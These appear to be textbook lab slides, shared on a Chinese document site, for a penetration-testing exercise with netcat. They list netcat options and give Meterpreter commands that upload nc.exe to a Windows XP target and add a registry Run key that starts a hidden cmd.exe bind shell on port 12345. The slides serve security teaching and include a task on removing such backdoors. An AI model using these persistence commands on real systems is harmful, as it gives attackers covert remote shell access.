《(网络空间安全技术实践)15.1netcat利用实验》由会员分享,可在线阅读,更多相关《(网络空间安全技术实践)15.1netcat利用实验(14页珍藏版)》请在金锄头文库上搜索。
1、网络空间安全技术实践教程,吕秋云,王小军,胡耿然,汪云路,王秋华 西安电子科技大学出版社,第四篇 渗透攻击测试实验篇,第十五章 漏洞利用实验 15.1 Netcat利用实验,网络空间安全技术实践教程,2,15.1 Netcat利用实验,实验目的: 熟练掌握Netcat工具的使用以及利用Meterpreter和Netcat在目标系统留取后门的流程。,网络空间安全技术实践教程,3,15.1 Netcat利用实验,实验原理: Netcat是一款用于发送和接收TCP和UDP流量的工具,它既可以以服务器模式来运行,也可以以客户端模式来运行。Netcat的功能十分强大,被人们称作“瑞士军刀”,它可以用来登
2、录远程服务(类似于Telnet),在计算机之间传递文件,执行端口扫描,进行即时通信,搭建简单的服务器等等。,网络空间安全技术实践教程,4,15.1 Netcat利用实验,实验原理:,网络空间安全技术实践教程,5,连接到服务器: nc -options hostname ports ports . 监听或入站: nc -l -p port -options hostname port 常用参数: -d 后台隐藏运行(仅适用于Windows) -e program 建立连接后执行的程序 -l 监听状态(连接断开后监听停止) -L 监听状态(仅适用于Windows,连接断开后仍保持监听) -p po
3、rt 本地端口号 -u UDP模式 -v 显示详细信息(-vv可显示更详细的信息) -w secs 设置时延 -z 零I/O模式(用于端口扫描),15.1 Netcat利用实验,实验要点说明:(实验难点说明) Meterpreter的使用 Netcat的使用,网络空间安全技术实践教程,6,15.1 Netcat利用实验,实验准备: (实验环境,实验先有知识技术说明) Kali Linux Netcat (Windows版本) Windows XP(靶机),网络空间安全技术实践教程,7,15.1 Netcat利用实验,实验步骤: (1)在留取后门之前,首先要获得目标系统的控制权。假设我们已经使用
4、Metasploit对目标计算机完成了漏洞利用并获取了一个Meterpreter的shell,我们可以使用该shell与目标计算机进行交互。,网络空间安全技术实践教程,8,15.1 Netcat利用实验,实验步骤: (2)将Netcat程序上传到目标计算机上: meterpreter upload nc.exe C:WINDOWSsystem32,网络空间安全技术实践教程,9,15.1 Netcat利用实验,实验步骤: (3)使用reg setval命令将Netcat写入注册表的启动项: meterpreter reg setval -k HKLMSOFTWAREMicrosoftWindow
5、s CurrentVersionRun -v Netcat -d C:WINDOWSsystem32nc.exe -Ldp 12345 -e cmd.exe,网络空间安全技术实践教程,10,15.1 Netcat利用实验,实验步骤: (4)使用Netcat登陆目标计算机上的后门进行验证。,网络空间安全技术实践教程,11,15.1 Netcat利用实验,实验要求: 使用Metasploit和Netcat工具在Windows系统和Linux系统上留取后门。,网络空间安全技术实践教程,12,15.1 Netcat利用实验,实验扩展要求: 对Windows系统和Linux系统分别分析如何检查并清除Netcat后门程序。,网络空间安全技术实践教程,13,15.1 Netcat利用实验,实验视频:,网络空间安全技术实践教程,14,
